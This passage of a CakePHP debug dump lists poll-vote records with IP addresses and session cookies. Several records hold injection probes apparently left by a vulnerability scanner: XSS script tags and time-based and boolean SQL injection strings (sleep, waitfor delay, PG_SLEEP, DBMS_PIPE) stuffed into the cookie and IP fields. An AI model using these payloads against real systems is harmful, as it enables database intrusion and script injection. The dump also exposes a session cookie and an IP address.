'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5284 => array(
'id' => '5827',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5285 => array(
'id' => '5828',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5286 => array(
'id' => '5829',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5287 => array(
'id' => '5830',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5288 => array(
'id' => '5831',
'ip' => '194.34.233.72',
'ip1' => 'wvstest=javascript:domxssExecutionSink(1,',
'sondage_id' => '2'
),
(int) 5289 => array(
'id' => '5832',
'ip' => '194.34.233.72',
'ip1' => 'wvstest=javascript:domxssExecutionSink(1,',
'sondage_id' => '2'
),
(int) 5290 => array(
'id' => '5833',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5291 => array(
'id' => '5834',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5292 => array(
'id' => '5835',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5293 => array(
'id' => '5836',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5294 => array(
'id' => '5837',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5295 => array(
'id' => '5838',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5296 => array(
'id' => '5839',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5297 => array(
'id' => '5840',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5298 => array(
'id' => '5841',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5299 => array(
'id' => '5842',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5300 => array(
'id' => '5843',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5301 => array(
'id' => '5844',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5302 => array(
'id' => '5845',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5303 => array(
'id' => '5846',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5304 => array(
'id' => '5847',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5305 => array(
'id' => '5848',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5306 => array(
'id' => '5849',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5307 => array(
'id' => '5850',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5308 => array(
'id' => '5851',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5309 => array(
'id' => '5852',
'ip' => '194.34.233.729734403',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5310 => array(
'id' => '5853',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201'"()&%<zzz><ScRiPt >ZXNd(9870)</ScRiPt>',
'sondage_id' => '2'
),
(int) 5311 => array(
'id' => '5854',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5312 => array(
'id' => '5855',
'ip' => '194.34.233.72',
'ip1' => ''"()&%<zzz><ScRiPt >ZXNd(9773)</ScRiPt>',
'sondage_id' => '2'
),
(int) 5313 => array(
'id' => '5856',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac2019565064',
'sondage_id' => '2'
),
(int) 5314 => array(
'id' => '5857',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5315 => array(
'id' => '5858',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5316 => array(
'id' => '5859',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5317 => array(
'id' => '5860',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5318 => array(
'id' => '5861',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5319 => array(
'id' => '5862',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5320 => array(
'id' => '5863',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5321 => array(
'id' => '5864',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5322 => array(
'id' => '5865',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5323 => array(
'id' => '5866',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5324 => array(
'id' => '5867',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5325 => array(
'id' => '5868',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5326 => array(
'id' => '5869',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5327 => array(
'id' => '5870',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5328 => array(
'id' => '5871',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5329 => array(
'id' => '5872',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5330 => array(
'id' => '5873',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5331 => array(
'id' => '5874',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5332 => array(
'id' => '5875',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5333 => array(
'id' => '5876',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5334 => array(
'id' => '5877',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5335 => array(
'id' => '5878',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5336 => array(
'id' => '5879',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5337 => array(
'id' => '5880',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5338 => array(
'id' => '5881',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5339 => array(
'id' => '5882',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5340 => array(
'id' => '5883',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5341 => array(
'id' => '5884',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5342 => array(
'id' => '5885',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5343 => array(
'id' => '5886',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5344 => array(
'id' => '5887',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5345 => array(
'id' => '5888',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5346 => array(
'id' => '5889',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5347 => array(
'id' => '5890',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5348 => array(
'id' => '5891',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5349 => array(
'id' => '5892',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5350 => array(
'id' => '5893',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5351 => array(
'id' => '5894',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5352 => array(
'id' => '5895',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5353 => array(
'id' => '5896',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5354 => array(
'id' => '5897',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5355 => array(
'id' => '5898',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5356 => array(
'id' => '5899',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5357 => array(
'id' => '5900',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5358 => array(
'id' => '5901',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5359 => array(
'id' => '5902',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5360 => array(
'id' => '5903',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5361 => array(
'id' => '5904',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5362 => array(
'id' => '5905',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5363 => array(
'id' => '5906',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5364 => array(
'id' => '5907',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5365 => array(
'id' => '5908',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5366 => array(
'id' => '5909',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5367 => array(
'id' => '5910',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5368 => array(
'id' => '5911',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5369 => array(
'id' => '5912',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5370 => array(
'id' => '5913',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5371 => array(
'id' => '5914',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5372 => array(
'id' => '5915',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5373 => array(
'id' => '5916',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5374 => array(
'id' => '5917',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5375 => array(
'id' => '5918',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5376 => array(
'id' => '5919',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5377 => array(
'id' => '5920',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5378 => array(
'id' => '5921',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5379 => array(
'id' => '5922',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5380 => array(
'id' => '5923',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5381 => array(
'id' => '5924',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5382 => array(
'id' => '5925',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5383 => array(
'id' => '5926',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5384 => array(
'id' => '5927',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5385 => array(
'id' => '5928',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5386 => array(
'id' => '5929',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5387 => array(
'id' => '5930',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5388 => array(
'id' => '5931',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5389 => array(
'id' => '5932',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5390 => array(
'id' => '5933',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5391 => array(
'id' => '5934',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5392 => array(
'id' => '5935',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5393 => array(
'id' => '5936',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5394 => array(
'id' => '5937',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5395 => array(
'id' => '5938',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5396 => array(
'id' => '5939',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5397 => array(
'id' => '5940',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5398 => array(
'id' => '5941',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5399 => array(
'id' => '5942',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5400 => array(
'id' => '5943',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5401 => array(
'id' => '5944',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5402 => array(
'id' => '5945',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5403 => array(
'id' => '5946',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5404 => array(
'id' => '5947',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5405 => array(
'id' => '5948',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5406 => array(
'id' => '5949',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5407 => array(
'id' => '5950',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5408 => array(
'id' => '5951',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5409 => array(
'id' => '5952',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5410 => array(
'id' => '5953',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5411 => array(
'id' => '5954',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5412 => array(
'id' => '5955',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5413 => array(
'id' => '5956',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5414 => array(
'id' => '5957',
'ip' => '194.34.233.72'"',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5415 => array(
'id' => '5958',
'ip' => '@@jrFks',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5416 => array(
'id' => '5959',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5417 => array(
'id' => '5960',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5418 => array(
'id' => '5961',
'ip' => '194.34.233.72',
'ip1' => '-1 OR 2+455-455-1=0+0+0+1 -- ',
'sondage_id' => '2'
),
(int) 5419 => array(
'id' => '5962',
'ip' => '194.34.233.72',
'ip1' => '-1 OR 2+882-882-1=0+0+0+1',
'sondage_id' => '2'
),
(int) 5420 => array(
'id' => '5963',
'ip' => '194.34.233.72',
'ip1' => '-1' OR 2+589-589-1=0+0+0+1 -- ',
'sondage_id' => '2'
),
(int) 5421 => array(
'id' => '5964',
'ip' => '194.34.233.72',
'ip1' => '-1' OR 2+427-427-1=0+0+0+1 or 'XZWcHQx9'='',
'sondage_id' => '2'
),
(int) 5422 => array(
'id' => '5965',
'ip' => '194.34.233.72',
'ip1' => '-1" OR 2+564-564-1=0+0+0+1 -- ',
'sondage_id' => '2'
),
(int) 5423 => array(
'id' => '5966',
'ip' => '194.34.233.72',
'ip1' => 'if(now()=sysdate(),sleep(15),0)',
'sondage_id' => '2'
),
(int) 5424 => array(
'id' => '5967',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac2010'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z',
'sondage_id' => '2'
),
(int) 5425 => array(
'id' => '5968',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac2010"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z',
'sondage_id' => '2'
),
(int) 5426 => array(
'id' => '5969',
'ip' => '194.34.233.72',
'ip1' => '(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/',
'sondage_id' => '2'
),
(int) 5427 => array(
'id' => '5970',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201-1 waitfor delay '0:0:15' -- ',
'sondage_id' => '2'
),
(int) 5428 => array(
'id' => '5971',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac2012J1Sjq54'; waitfor delay '0:0:15' -- ',
'sondage_id' => '2'
),
(int) 5429 => array(
'id' => '5972',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201Kc3kdX82' OR 951=(SELECT 951 FROM PG_SLEEP(15))--',
'sondage_id' => '2'
),
(int) 5430 => array(
'id' => '5973',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac2019KjJdFMQ') OR 35=(SELECT 35 FROM PG_SLEEP(15))--',
'sondage_id' => '2'
),
(int) 5431 => array(
'id' => '5974',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac2013eTC3tD1')) OR 907=(SELECT 907 FROM PG_SLEEP(15))--',
'sondage_id' => '2'
),
(int) 5432 => array(
'id' => '5975',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'',
'sondage_id' => '2'
),
(int) 5433 => array(
'id' => '5976',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5434 => array(
'id' => '5977',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201'"',
'sondage_id' => '2'
),
(int) 5435 => array(
'id' => '5978',
'ip' => '194.34.233.72',
'ip1' => '@@RPkLn',
'sondage_id' => '2'
),
(int) 5436 => array(
'id' => '5979',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5437 => array(
'id' => '5980',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5438 => array(
'id' => '5981',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5439 => array(
'id' => '5982',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5440 => array(
'id' => '5983',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5441 => array(
'id' => '5984',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5442 => array(
'id' => '5985',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5443 => array(
'id' => '5986',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5444 => array(
'id' => '5987',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5445 => array(
'id' => '5988',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5446 => array(
'id' => '5989',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5447 => array(
'id' => '5990',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5448 => array(
'id' => '5991',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5449 => array(
'id' => '5992',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5450 => array(
'id' => '5993',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5451 => array(
'id' => '5994',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5452 => array(
'id' => '5995',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5453 => array(
'id' => '5996',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5454 => array(
'id' => '5997',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5455 => array(
'id' => '5998',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5456 => array(
'id' => '5999',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5457 => array(
'id' => '6000',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
